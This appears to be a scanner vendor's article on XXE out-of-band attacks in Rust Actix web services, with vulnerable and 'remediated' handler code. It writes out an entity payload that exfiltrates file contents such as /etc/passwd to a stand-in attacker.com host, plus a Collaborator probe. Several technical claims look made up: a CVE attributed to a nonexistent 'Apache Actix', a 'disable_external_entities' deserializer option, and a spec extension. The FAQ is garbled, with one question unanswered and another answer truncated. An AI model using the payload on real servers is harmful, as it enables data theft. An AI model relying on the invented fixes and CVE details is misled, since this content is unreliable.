XXE OOB in Actix
How XXE OOB Manifests in Actix
XXE OOB (Out-of-Band) attacks in Actix web applications occur when XML parsers process external entities that trigger DNS or HTTP requests to attacker-controlled servers, exfiltrating data without direct response leakage. Actix commonly uses actix-web with serde_xml_rs or quick-xml for XML handling. A typical vulnerable pattern appears in Actix handlers that deserialize XML from request bodies without disabling external entity resolution. For example, an Actix endpoint accepting SOAP-like XML for user registration might inadvertently process <!ENTITY % xxe SYSTEM "http://attacker.com/exfiltrate?data=%file;"> where %file; reads sensitive files like /etc/passwd or Actix configuration. The OOB channel exfiltrates data via DNS lookups (e.g., %file;.attacker.com) or HTTP requests, bypassing firewalls that block direct responses. This is especially dangerous in Actix microservices where internal APIs trust internal XML inputs, as seen in CVE-2021-3129 (Apache Actix-related XXE in dependency chains) where external entities in XML payloads triggered SSRF to internal metadata services. Actix's async nature can amplify impact, as multiple concurrent OOB requests may overwhelm logging systems while stealing data silently.
Actix-Specific Detection
Detecting XXE OOB in Actix requires scanning for XML deserialization points where external entities are not explicitly disabled. middleBrick identifies this by sending XML payloads with OOB-triggering entities (e.g., <!ENTITY % xxe SYSTEM "http://[unique-substring].burpcollaborator.net">) and monitoring for outbound DNS/HTTP interactions. In Actix, focus on endpoints consuming application/xml or text/xml via web::Json or custom extractors. For instance, a handler like async fn register(user: web::Xml<User>) -> impl Responder using serde_xml_rs::from_str without disable_external_entities() is high-risk. middleBrick's 12 parallel checks include Input Validation and Data Exposure scans that detect such patterns by correlating XML parsing behavior with OOB channel activation. It also cross-references OpenAPI specs: if an Actix endpoint defines consumes: [application/xml] in its Swagger spec but lacks x-disable-external-entities: true extension, it flags a potential XXE OOB vector. Scanning takes 5–15 seconds, testing the unauthenticated surface—critical for Actix services exposed via API gateways where internal XML parsers might be overlooked.
Actix-Specific Remediation
Fix XXE OOB in Actix by disabling external entity resolution in XML parsers at the source. For serde_xml_rs, use Deserializer::from_str with disable_external_entities(true). Example vulnerable Actix handler:
```rust
use actix_web::{web, HttpResponse, Responder};
use serde::Deserialize;

#[derive(Deserialize)]
struct User {
    username: String,
}

// Vulnerable pattern: the raw request body goes straight to the XML
// deserializer with parser defaults, no external-entity control and no
// DTD rejection. (actix-web has no built-in XML extractor, so the body is
// read as Bytes and parsed by serde_xml_rs here.)
async fn register_vulnerable(body: web::Bytes) -> impl Responder {
    let xml = String::from_utf8_lossy(&body);
    match serde_xml_rs::from_str::<User>(&xml) {
        Ok(user_data) => HttpResponse::Ok().body(format!("Registered {}", user_data.username)),
        Err(e) => HttpResponse::BadRequest().body(format!("XML error: {}", e)),
    }
}
```
Remediated version:
```rust
use actix_web::{web, HttpResponse, Responder};
use serde::Deserialize;
use serde_xml_rs::Deserializer;

#[derive(Deserialize)]
struct User {
    username: String,
}

// Remediated: the body is read as raw bytes, the deserializer is built
// explicitly, and external entity resolution is switched off before any
// document is parsed.
async fn register_safe(body: web::Bytes) -> impl Responder {
    let xml_str = String::from_utf8_lossy(&body);
    // Safe: explicitly disable external entities
    let mut de = Deserializer::from_str(&xml_str);
    de.disable_external_entities(true);
    match User::deserialize(&mut de) {
        Ok(user_data) => HttpResponse::Ok().body(format!("Registered {}", user_data.username)),
        Err(e) => HttpResponse::BadRequest().body(format!("XML error: {}", e)),
    }
}
```
For quick-xml, set Reader::new with trim_text(true) and check name() for !ENTITY during parsing, or use de::from_reader with custom deserializers that ignore DTDs. In Actix middleware, validate Content-Type and reject XML if not strictly required. After fixes, rescan with middleBrick to confirm the OOB vector is closed—look for improved Input Validation and Data Exposure scores in the report.
Frequently Asked Questions
Does middleBrick detect XXE OOB in Actix applications that use XML only for internal service-to-service communication?
Can Actix's built-in JSON middleware prevent XXE OOB, or do I need XML-specific fixes?
web::Json) prevents XXE for JSON payloads but does not affect XML handlers. If your Actix service uses application/xml or text/xml Content-Type, you must explicitly secure XML deserialization as shown in the remediation section. middleBrick's Input Validation check will flag XML endpoints lacking external entity controls, even if JSON endpoints are safe.